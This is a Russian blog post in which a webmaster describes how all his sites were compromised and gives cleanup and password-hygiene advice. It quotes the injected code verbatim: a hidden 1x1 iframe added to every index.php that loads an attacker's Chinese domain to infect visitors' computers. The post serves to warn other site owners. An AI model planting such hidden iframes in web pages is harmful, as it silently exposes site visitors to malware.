Главная » Материалы » IT info » Полезные советы
Оказалось, что был вирус
14 Апреля 2017, 00:24
Пока не убедился в чем причина, не писал этот пост, хотя и проблемы все разрешил через 2 часа после взлома всех моих сайтов.
Сидел я себе в интернете, читал очередной интереснейший блог одного из авторов и попутно делал заметки в своем и тут опа, сайт стал недоступен. А через время я выяснил, что все мои сайты были прибиты чем-то непонятным. Они просто не открывались.
В код сайта, а именно в файлы index.php (во всех папках, неважно используются ли файлы или нет ) был добавлен такой текст
<iframe src"http://yourliteseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe>
Таким образом, при загрузке зараженных сайтов должен был в невидимом фрейме одновременно загружаться сайт злоумышленников на котором находился вредоносный код, приводивший к заражению компьютера жертвы вирусом.
Так получилось с большинством сайтов в интернете, но не у меня. У меня как-то странно вышло, код добавлялся в таком виде в самом конце страницы:
<?php тралялля ?<iframe src="http://yourliteseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe>>
Как можно заметить, что код вставлялся автоматически, ребята хорошо продумали вирус и работал бы он у них прекрасно если бы код вставляли всего лишь на один символ правее.
Настоятельно рекомендую проверить все свои сайты на код, искать лучше всего по слову iframe. Если у Вас есть код такого вида, то чистите код, меняйте все свои пароли на ftp аккаунты и меняйте свой антивирус. Я свой хваленый NOD32 выкинул и поставил Avast!. Было бы еще неплохо снести винду и поставить ее заново как это сделал я.
Советую не хранить пароли от ftp в Total Commander's или других ftp клиентах и регулярно делать бекапы. Поверьте моему опыту, когда случиться беда вы будете несказанно рады, что не ленились, только вот может быть уже поздно.
|
|||||||||
